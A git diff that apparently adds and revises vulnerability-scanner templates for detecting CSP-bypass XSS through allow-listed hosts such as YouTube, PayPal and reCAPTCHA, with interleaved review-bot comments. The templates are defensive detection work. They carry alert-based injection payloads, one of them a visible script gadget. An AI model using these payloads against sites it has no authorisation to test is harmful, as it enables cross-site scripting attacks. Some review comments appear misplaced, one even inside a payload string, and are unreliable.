@@ -0,0 +1,55 @@ +id: www-gstatic-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via GStatic ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_gstatic_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_gstatic_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml similarity index 50% rename from dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml rename to dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml index c9ac2664e1c..65bdba26478 100644 --- a/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml @@ -1,11 +1,11 @@ -id: meteoprog-csp-xss +id: www-meteoprog-csp-xss info: name: Content-Security-Policy Bypass via Meteoprog - author: DhiyaneshDK - severity: high + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L193C18-L193C120 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,meteoprog 
@@ -25,7 +25,7 @@ http: type: replace mode: single fuzz: - - "{{injection}}" + - "{{url_encode(injection)}}" matchers-condition: and matchers: @@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "meteoprog.ua" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: www_meteoprog_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_meteoprog_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml new file mode 100644 index 00000000000..1c3983f9470 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-microsoft-csp-xss + +info: + name: Content-Security-Policy Bypass via Microsoft API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,microsoft + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_microsoft_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_microsoft_csp_xss == true" \ No newline at end of file 
diff --git a/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml new file mode 100644 index 00000000000..18d09a3730a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-paypal-csp-xss + +info: + name: Content-Security-Policy Bypass via PayPal API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,paypal + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_paypal_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_paypal_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..5413aeeaf52 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,recaptcha + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml new file mode 100644 index 00000000000..ec114e8d865 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-reddit-csp-xss + +info: + name: Content-Security-Policy Bypass via Reddit API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,reddit + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_reddit_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_reddit_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml new file mode 100644 index 00000000000..aa997321c6c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-roblox-csp-xss + +info: + name: Content-Security-Policy Bypass via Roblox API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,roblox + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_roblox_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_roblox_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml new file mode 100644 index 00000000000..802a283244f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-st-csp-xss + +info: + name: Content-Security-Policy Bypass via ST + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,st + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_st_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_st_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml new file mode 100644 index 00000000000..22618996e13 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-yastat-csp-xss + +info: + name: Content-Security-Policy Bypass via Yastat + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yastat + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
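Review bot: The name `Content-Security-Policy Bypass via ST` does not identify which allow-listed host this template relies on, and `tags: xss,csp-bypass,st` does not either, so someone triaging a finding cannot tell it apart from `yandex-st-csp-xss` later in this batch. If both data.tsv rows point at the same host, one of the two templates is redundant and will double-report; otherwise the name should carry the host (e.g. `name: Content-Security-Policy Bypass via <host from data.tsv>`) and the tag should match it.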
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_yastat_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_yastat_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml new file mode 100644 index 00000000000..69cd3522fde --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-yastatic-csp-xss + +info: + name: Content-Security-Policy Bypass via Yastatic + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yastatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_yastatic_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_yastatic_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml new file mode 100644 index 00000000000..471a4bf0dcb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-youtube-csp-xss + +info: + name: Content-Security-Policy Bypass via YouTube API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,youtube + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_youtube_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_youtube_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml new file mode 100644 index 00000000000..0579b7c5379 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: x-api-csp-xss + +info: + name: Content-Security-Policy Bypass via X API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,x + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: x_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "x_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml new file mode 100644 index 00000000000..b1d89c2432b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: yahoo-ads-yap-csp-xss + +info: + name: Content-Security-Policy Bypass via Yahoo Ads Yap + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yahoo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: yahoo_ads_yap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "yahoo_ads_yap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml new file mode 100644 index 00000000000..a78fd01c02e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml 
@@ -0,0 +1,55 @@
+id: yandex-st-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex ST
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yandex_st_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yandex_st_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
deleted file mode 100644
index 0e02b5cfb9b..00000000000
--- a/dast/vulnerabilities/xss/csp/youku-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: youku-csp-xss - -info: - name: Content-Security-Policy Bypass via Youku ACS - author: DhiyaneshDK - severity: high - reference: - - https://github.com/renniepak/CSPBypass/blob/main/data.tsv - metadata: - verified: true - tags: xss,csp-bypass,youku - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{url_encode(injection)}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "acs.youku.com" - - "script-src" - condition: and
diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml index 215f995b85c..436526cd83f 100644 --- a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml @@ -1,12 +1,11 @@ id: youtube-csp-xss info: - name: Content-Security-Policy Bypass via Youtube - author: DhiyaneshDK - severity: high + name: Content-Security-Policy Bypass via YouTube + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://infosecwriteups.com/riding-the-waves-of-api-versioning-unmasking-a-stored-xss-vulnerability-bypassing-csp-using-c039c10df2b1 - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L206C17-L206C89 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,youtube @@ -19,14 +18,14 @@ http: payloads: injection: - - '' + - '' fuzzing: - part: query type: replace mode: single fuzz: - - "{{injection}}" + - "{{url_encode(injection)}}" matchers-condition: and matchers: @@ -34,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "www.youtube.com" - - "script-src" - condition: and + - action: waitload + + - action: waitdialog + name: youtube_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "youtube_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml new file mode 100644 index 00000000000..65067a2cc57 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml 
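Review bot: The `reference` entry in the first hunk is changed from a commit-pinned URL with a line anchor to `https://github.com/renniepak/CSPBypass/blob/main/data.tsv`, an unpinned branch link, so the row backing the `verified: true` claim can move or disappear and a reader can no longer locate the evidence. Keeping the commit-pinned link (or pinning to the current head of `main`) would keep the metadata reproducible; every new file in this series uses the same unpinned link. The removal of the `content_type` and `content_security_policy` matchers in the third hunk is the same gap already noted on the x-api hunk.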
@@ -0,0 +1,55 @@
+id: yuedust-yuedu-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yuedust Yuedu
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yuedust
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
foo
{{ [1].reduce(value.alert, 1); }}
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yuedust_yuedu_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yuedust_yuedu_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
new file mode 100644
index 00000000000..e953ae350af
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yugiohmonstrosdeduelo-blogspot-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yugioh Blogspot
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,blogspot
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yugiohmonstrosdeduelo_blogspot_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yugiohmonstrosdeduelo_blogspot_csp_xss == true"
\ No newline at end of file
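Review bot: The `injection` payload is written as a multi-line single-quoted scalar, which folds each line break into a single space, so the committed value is the first line, `foo` and `{{ [1].reduce(value.alert, 1); }}` joined by spaces with a trailing space before the closing `'`; if the line breaks are meant to survive, a block scalar (`- |-`) is the form that keeps them, and if they are not, the value belongs on one line like the other templates in this series. As rendered here the continuation lines sit at column 0, and if that is the committed indentation the file does not parse, since continuation lines of a quoted scalar must be indented past the enclosing sequence entry. It is also worth confirming that the engine does not treat the double-brace fragment inside the payload as one of its own template expressions when it expands `{{url_encode(injection)}}`.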
diff --git a/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
new file mode 100644
index 00000000000..8d8f05a9bfd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhike-help-360-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zhike Help 360
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zhike
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: zhike_help_360_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "zhike_help_360_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
new file mode 100644
index 00000000000..deea2df08e2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhuanjia-sogou-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zhuanjia Sogou
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zhuanjia
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: zhuanjia_sogou_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "zhuanjia_sogou_csp_xss == true"
\ No newline at end of file